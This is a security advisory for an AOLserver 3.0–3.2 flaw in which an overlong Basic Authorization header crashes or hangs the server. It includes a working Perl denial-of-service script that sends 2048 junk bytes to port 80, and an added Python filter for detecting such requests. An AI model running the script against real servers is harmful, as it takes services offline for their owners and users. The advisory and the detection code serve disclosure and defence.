
AOLServer 3.2 exploitable buffer overflow

COMMAND

    AOLserver

SYSTEMS AFFECTED

    AOLserver 3.0..3.2

PROBLEM

    Nate Haggard found the following.  AOLserver 3.0 will crash when it
    is given a long authorization string.  It is also possible that this
    vulnerability will allow a hacker to execute arbitrary code through
    a buffer overflow.

    Here is a sample exploit:

    #!/usr/bin/perl
    use IO::Socket;
    unless (@ARGV == 1) { die "usage: $0 host ..." }
    $host = shift(@ARGV);
    $remote = IO::Socket::INET->new( Proto     => "tcp",
                                     PeerAddr  => $host,
                                     PeerPort  => "http(80)",
                                     );
    unless ($remote) { die "cannot connect to http daemon on $host" }

    $junk = "X" x 2048;
    $killme = "GET / HTTP/1.0\nAuthorization: Basic ".$junk."\r\n\r\n";
    $remote->autoflush(1);
    print $remote $killme;
    close $remote;

    AOLserver 3.2 is also vulnerable (Red Hat 6.0++, kernel 2.2.19).
    Btw, the line above that builds $killme should be:

        $killme = "GET / HTTP/1.0\r\nAuthorization: Basic ".$junk."\r\n\r\n";

    but it doesn't matter; it seems to make AOLserver hang either way.

SOLUTION

    AOLserver 3.4 and 3.3.1 are not vulnerable to this attack.
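
    Where an affected version cannot be upgraded at once, a front-end
    filter or log check can flag the request shape described above.  The
    following is an added example, not code from the advisory or from the
    AOLserver project; the 512-byte limit and all names in it are
    assumptions, and the sample requests are constructed.

```python
import base64
import binascii
import re

# Assumed policy limit (not from the advisory): real Basic credentials are
# base64("user:password") and rarely come anywhere near this many bytes.
MAX_BASIC_CRED_LEN = 512

# Header lines may end in CRLF or a bare LF; the advisory notes the server
# reacts to either form, so the check has to accept both.
_LINE_SPLIT = re.compile(rb"\r?\n")
_HEAD_END = re.compile(rb"\r?\n\r?\n")


def check_basic_auth(raw_request: bytes, limit: int = MAX_BASIC_CRED_LEN) -> str:
    """Classify the Authorization header of a raw HTTP request.

    Returns "none", "ok", "oversize" or "malformed".
    """
    head = _HEAD_END.split(raw_request, maxsplit=1)[0]
    for line in _LINE_SPLIT.split(head)[1:]:      # skip the request line
        name, sep, value = line.partition(b":")
        if not sep or name.strip().lower() != b"authorization":
            continue
        scheme, _, cred = value.strip().partition(b" ")
        if scheme.lower() != b"basic":
            return "none"                         # other schemes are out of scope
        cred = cred.strip()
        if len(cred) > limit:
            return "oversize"                     # reject before decoding or copying
        try:
            decoded = base64.b64decode(cred, validate=True)
        except (binascii.Error, ValueError):
            return "malformed"
        return "ok" if b":" in decoded else "malformed"
    return "none"


# Constructed sample requests (not captured traffic).
NORMAL = b"GET / HTTP/1.0\r\nAuthorization: Basic " + base64.b64encode(b"alice:s3cret") + b"\r\n\r\n"
LONG_CRLF = b"GET / HTTP/1.0\r\nAuthorization: Basic " + b"X" * 2048 + b"\r\n\r\n"
LONG_LF = b"GET / HTTP/1.0\nAuthorization: Basic " + b"X" * 2048 + b"\r\n\r\n"

if __name__ == "__main__":
    for label, req in (("normal", NORMAL), ("long, CRLF", LONG_CRLF), ("long, bare LF", LONG_LF)):
        print(f"{label}: {check_basic_auth(req)}")
```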
